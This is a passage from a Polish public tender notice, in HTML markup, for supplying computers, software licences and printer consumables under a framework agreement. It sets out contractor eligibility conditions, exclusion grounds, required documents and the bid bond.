zamówienia, ocena wymagań określonych w zakresie spełnienia niniejszego warunku udziału w postępowaniu będzie dokonana łącznie w stosunku do Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej (kontraktowej i deliktowej) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w kwocie minimum 300 000,00 zł może potwierdzać spełnienie tego warunku w zakresie jednego z Wykonawców,c)	wstępnie potwierdzająca ocena, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu zostanie dokonana przez Zamawiającego na postawie złożonego/ych przez Wykonawcę wraz z ofertą wymaganego/ych ww. oświadczenia/eń (Załącznik Nr 3A do SIWZ), na zasadzie spełnia: spełnia - nie spełnia,d)	następnie ocena potwierdzająca, że Wykonawca spełnia warunek udziału w postępowaniu w zakresie wymaganego/ych wezwaniem Zamawiającego w trakcie postępowania oświadczenia/eń lub dokumentu/ów (zgodnie z art. 26 ust. 2 ustawy), zostanie dokonana na zasadzie: spełnia - nie spełnia</span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający wymaga, aby Wykonawca wykazał spełnienie niniejszego warunku udziału w postępowaniu w następujący sposób:1)	poprzez złożenie warz z ofertą (art. 25a ust. 1 ustawy) w zakresie niniejszego warunku oświadczenia/eń (wg Wzoru zawartego w Załączniku Nr 3A do SIWZ) aktualnego/ych na dzień składania ofert. Informacje zawarte w powyższym/ych oświadczeniu/ach stanowić będą wstępne potwierdzenie, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu;2)	i poprzez posiadanie i złożenie Zamawiającemu (w terminie wyznaczonym w trakcie postępowania w wezwaniu Zamawiającego - zgodnie z art. 26 ust. 2 ustawy) aktualnego/ych na dzień złożenia wykazu dostaw (wg Wzoru zawartego w Załączniku Nr 6 do SIWZ) w celu wykazania w nim, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca wykonał (zakończył), a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie minimum dwa zamówienia polegające na dostawie:a)	komputerów stacjonarnych i/lub przenośnych i/lub serwerów, monitorów ekranowych, drukarek i/lub urządzeń wielofunkcyjnych o łącznej wartości dostaw na kwotę nie mniejszą niż 250 000,00 zł netto,b)	licencji na oprogramowanie biurowe i/lub na systemy operacyjne o łącznej wartości dostaw na kwotę nie mniejszą niż 50 000,00 zł netto,c)	materiałów eksploatacyjnych o łącznej wartości dostaw na kwotę nie mniejszą niż 150 000,00 zł nettowraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Informacje zawarte w złożonym/ych dokumencie/tach stanowić będą udokumentowane potwierdzenie, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu w ww. zakresie</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">3)	Dodatkowe informacje:a)	do przeliczenia na PLN (zł) wartości wskazanej w dokumencie/tach złożonym/ch na potwierdzenie spełnienia niniejszego warunku udziału w postępowaniu, wyrażonej w walutach innych niż PLN (zł), Zamawiający przyjmie średni kurs publikowany przez Narodowy Bank Polski z dnia wszczęcia postępowania,b)	w przypadku oferty składnej wspólnie przez kilku Wykonawców ubiegających się o udzielenie zamówienia, ocena wymagań określonych w zakresie spełnienia niniejszego warunku udziału w postępowaniu będzie dokonana łącznie w stosunku do Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Ww. dostawy może spełnić i wykazać(wg Wzoru zawartego w Załączniku Nr 6 do SIWZ) jeden Wykonawca lub Wykonawcy wspólnie. c)	wstępnie potwierdzająca ocena, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu zostanie dokonana przez Zamawiającego na postawie złożonego/ych przez Wykonawcę wraz z ofertą wymaganego/ych ww. oświadczenia/eń (Załącznik Nr 3A do SIWZ), na zasadzie spełnia: spełnia - nie spełnia,d)	następnie ocena potwierdzająca, że Wykonawca spełnia warunek udziału w postępowaniu w zakresie wymaganego/ych wezwaniem Zamawiającego w trakcie postępowania oświadczenia/eń lub dokumentu/ów (zgodnie z art. 26 ust. 2 ustawy), zostanie dokonana na zasadzie: spełnia - nie spełnia. </span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1)	Wykonawca składa Zamawiającemu w terminie wyznaczonym w trakcie postępowania w wezwaniu Zamawiającego aktualne na dzień złożenia:a)	informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,b)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,c)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,d)	odpis/sy z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy;W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców dokumenty, o których mowa w ust. 2 pkt. 1 lit. a-d), składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)	V Rozdziale SIWZ w ust. 3 Tabela poz. Lp. 1 pkt. 2 Wykonawca składa Zamawiającemu (w terminie wyznaczonym w trakcie postępowania w wezwaniu Zamawiającego - zgodnie z art. 26 ust. 2 ustawy) aktualnego/ych i obowiązującego/ych na dzień złożenia, zezwolenia/eń na prowadzenie działalności w zakresie zbierania i transportu tych zużytych materiałów eksploatacyjnych lub zwolnienia z uzyskania tego zezwolenia/eń zgodnie z obowiązującą ustawą z dnia 14 grudnia 2012 roku o odpadach (Dz. U. z 2013 r., poz. 21, z późn. zm.), ważnego/ych co najmniej przez okres 6 miesięcy od zakończenia trwania umowy ramowej zawartej z Zamawiającym.W przypadku oferty składnej wspólnie przez kilku Wykonawców ubiegających się o udzielenie zamówienia niniejszy warunek udziału w postępowaniu Wykonawcy mogą spełnić wspólnie w taki sposób, ze działalność wymagająca posiadanie ww. koncesji na prowadzenie działalności gospodarczej w zakresie obrotu energią elektryczną może być wykazana poprzez złożenie ww. koncesji przez tego/tych Wykonawcę/ów, który/rzy będzie/będą wykonywał/li czynność/ci w procesie realizacji zamówienia, co do których wymagane jest posiadanie ww. koncesji w zakresie wymaganych kompetencji i/lub uprawnień. Wykonawca nie może w celu wykazania spełnienia tego warunku udziału w postępowaniu skorzystać z zasobów innych podmiotów (art. 22a ust. 1 ustawy nie ma zastosowania).2)	V Rozdziale SIWZ w ust. 3 Tabela poz. Lp. 2 pkt. 2 Wykonawca składa Zamawiającemu (w terminie wyznaczonym w trakcie postępowania w wezwaniu Zamawiającego - zgodnie z art. 26 ust. 2 ustawy) aktualnego/ych na dzień złożenia dokumentu/ów potwierdzającego/ych, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej (kontraktowej i deliktowej) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w kwocie minimum 300 000,00 zł.W przypadku oferty składnej wspólnie przez kilku Wykonawców ubiegających się o udzielenie zamówienia, ocena wymagań określonych w zakresie spełnienia niniejszego warunku udziału w postępowaniu będzie dokonana łącznie w stosunku do Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej (kontraktowej i deliktowej) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w kwocie minimum 300 000,00 zł może potwierdzać spełnienie tego warunku w zakresie jednego z Wykonawców. 3)	V Rozdziale SIWZ w ust. 3 Tabela poz. Lp. 3 pkt. 2 Wykonawca składa Zamawiającemu (w terminie wyznaczonym w trakcie postępowania w wezwaniu Zamawiającego - zgodnie z art. 26 ust. 2 ustawy) aktualnego/ych na dzień złożenia wykazu dostaw (wg Wzoru zawartego w Załączniku Nr 6 do SIWZ) w celu wykazania w nim, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca wykonał (zakończył), a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie minimum dwa zamówienia polegające na dostawie:a)	komputerów stacjonarnych i/lub przenośnych i/lub serwerów, monitorów ekranowych, drukarek i/lub urządzeń wielofunkcyjnych o łącznej wartości dostaw na kwotę nie mniejszą niż 250 000,00 zł netto,b)	licencji na oprogramowanie biurowe i/lub na systemy operacyjne o łącznej wartości dostaw na kwotę nie mniejszą niż 50 000,00 zł netto,c)	materiałów eksploatacyjnych o łącznej wartości dostaw na kwotę nie mniejszą niż 150 000,00 zł nettowraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1)	Zgodnie z wymaganiami zawartymi w V Rozdziale SIWZ w ust. 5 Tabela poz. Lp. 1 pkt. 2 Wykonawca składa Zamawiającemu (po otwarciu ofert) w terminie 3 dni od zamieszczenia przez Zamawiającego na stronie internetowej informacji, o których jest mowa w art. 86 ust. 5 ustawy - oświadczenia/eń Wykonawcy aktualnego/ych na dzień złożenia o przynależności albo o braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust.1 pkt. 23 ustawy, wg Wzoru zawartego w Załączniku Nr 5A do SIWZ. W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiazania z innym Wykonawcą nie prowadzą do zakłócania konkurencji w postępowaniu o udzielenie zamówienia.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, powyższe oświadczenie Wykonawcy o przynależności albo braku przynależności dom tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. W przypadku przynależności do tej samej grupy kapitałowej każdy z Wykonawców może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie poprowadzą do zakłócania konkurencji w postępowaniu.Powyższe oświadczenie/a z ust. 4. pkt. 1 Wykonawca składa pisemnie w oryginale w języku polskim;2)	Podmiot trzecia)	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informację o tych podmiotach w sowich oświadczeniach składanych na podstawie zapisów zawartych w V Rozdziale SIWZ w ust. 2, tj.:o	w swoim oświadczeniu dotyczącym przesłanek wykluczenia z postępowania - wg Wzoru zawartego w Załączniku Nr 3B do SIWZ (dotyczy zapisów zawartych w ust. 1 pkt. 1),o i w swoich oświadczeniach dotyczących spełnienia warunków udziału w postępowaniu - wg Wzoru zawartego w Załączniku Nr 3A do SIWZ (dotyczy zapisów zawartych w ust. 1 pkt. 2), b)	Ponadto w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający żąda również od Wykonawcy, który podlega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentów zgodnie z wymaganiami Zamawiającego zawartymi w ust. 2 pkt. 1 lit. a-d),c)	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia,d)	Wykonawca na mocy art. 22a ustawy może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych,e)	Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełnienia warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt. 13-22 i ust. 5 ustawy,f)	w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeżeli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane, z zastrzeżeniem zapisów zawartych w ust. 3 pkt. 1,g)	Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy;3)	Wykonawcy zagraniczni - jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2:a)	pkt. 1 lit. a) - składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy,b)	pkt. 1 lit. c-d) - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, żeo	nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,o	nie otwarto jego likwidacji ani nie ogłoszono upadłości,c)	dokumenty, o których mowa w ust. 4 pkt 3 lit. a) i pkt 3 lit. b) w tiret 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a dokument/ty, o którym/ych mowa w ust. 4 pkt 3 lit. b) w tiret 1, powinien/inny być wystawiony/e nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,d)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w ust. 4 pkt 3 lit. a-b), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Przepis ust. 4 pkt 3 lit. c) stosuje się,e)	W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu,f)	W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu,g)	Wykonawca wpisany do urzędowego wykazu zatwierdzonych Wykonawców lub Wykonawca certyfikowany przez jednostki certyfikujące spełniające wymogi europejskich norm certyfikacji może złożyć zaświadczenie o wpisie do urzędowego wykazu wydane przez właściwy organ lub certyfikat wydany przez właściwą jednostkę certyfikującą kraju, w którym Wykonawca ten ma siedzibę lub miejsce zamieszkania, wskazujące na dokumenty stanowiące podstawę wpisu lub uzyskania certyfikacji, w miejsce odpowiednich dokumentów wymaganych w niniejszym postępowaniu w celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu i w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu.5.	Inne dokumenty niewymienione w ust. 1-41)	W przypadku, gdy ofertę w imieniu Wykonawcy podpisuje(ą) osoba(y) inne(a) niż ujawnione w dokumencie, o którym mowa w ust. 2 pkt. 1 lit. d), do oferty należy załączyć pełnomocnictwo określające jego zakres;2)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, zgodnie z art. 23 ustawy, zobowiązani są ustanowić pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy oraz załączyć do oferty stosowne pełnomocnictwo określające jego zakres;3)	Jeżeli oferta Wykonawców, o których mowa w pkt. 2 zostanie wybrana, Zamawiający żąda dostarczenia do wglądu oryginału umowy regulującej współpracę tych Wykonawców w terminie, o którym mowa w XVI Rozdziale SIWZ w ust. 4, a kopia tej umowy zostanie umieszczona w aktach niniejszego postępowania;4)	Niezależnie od dokumentu, o którym mowa w pkt. 2, Wykonawcy ubiegający się wspólnie o udzielenie zamówienia składają jedną ofertę, przy czym:a)	żaden z nich nie może podlegać wykluczeniu z powodu nie spełnienia okoliczności, o których mowa w niniejszej Ogłoszenia, a wymagane w Ogłoszeniu oświadczenia i dokumenty składa każdy z Wykonawców oddzielnie,b)	wymagane oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w niniejszym postępowaniu, składa każdy z Wykonawców oddzielnie lub w imieniu Wykonawców składa ustanowiony pełnomocnik do reprezentowania ich w niniejszym postępowaniu, posiadający takie uprawnienia wskazane w tym zakresie w pełnomocnictwie, o którym mowa w ust. 5 pkt. 2,c)	wymagane oświadczenia i dokumenty, Wykonawcy składają w taki sposób, aby wykazać spełnienie danego warunku łącznied)	kopie dokumentów dotyczących Wykonawców wspólnie ubiegających się o udzielenie zamówienia są poświadczane za zgodność z oryginałem przez każdego Wykonawcę, którego dany dokument dotyczy, jeżeli w zakresie pełnomocnictwa, o którym mowa w ust. 5 pkt. 2 nie zostało ustanowione inaczej;5)	Wykonawca załącza do oferty zaakceptowany podpisem na stronie tytułowej lub na ostatniej stronie przez Wykonawcę wzór umowy - Załącznik Nr 4 do SIWZ wraz ze wzorem Umowy realizacyjnej, który jest zawarty w Załączniku Nr 1 do Załącznika Nr 4 do SIWZ;6)	Wykonawca załącza do oferty wypełniony formularz ofertowy, którego wzór zawarty jest w Załączniku Nr 2 do SIWZ;7)	Wykonawca(y) złoży(żą) Zamawiającemu (w terminie wyznaczonym w trakcie postępowania w wezwaniu Zamawiającego aktualne na dzień złożenia Oświadczenie, że w trakcie realizacji zamówienia (umowy ramowej) w przypadku upływu terminu ważności dokumentu/ów potwierdzającego/ych, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej (kontraktowej i deliktowej) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w kwocie minimum 300 000,00 zł, o którym/ych jest mowa w VI Rozdziale SIWZ w ust. 3 pkt. 2, zobowiązuje(ją) się do:o	kontynuacji ubezpieczenia oraz utrzymywania go przez okres umowy ramowej i 30 dni po jej zakończeniu,o	przedkładania Zamawiającemu, bez odrębnego wezwania, przed upływem terminu obowiązywania poprzednio przedłożonego dokumentu/ów, dokument/ty potwierdzający/e kontynuację ubezpieczenia wraz z potwierdzeniem opłacenia.Kopia dokumentu/ów potwierdzającego/ych, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej wraz z potwierdzeniem opłacenia zostanie załączona do Umowy. Wzór przedmiotowego oświadczenia zawarty jest w Załączniku Nr 5B do SIWZ</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">W niniejszym postępowaniu Zamawiający żąda wniesienia wadium w wysokości = 20 000,00 zł przed upływem terminu składania ofert w jednej lub kilku formach określonych w art. 45 ust. 6 ustawy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna 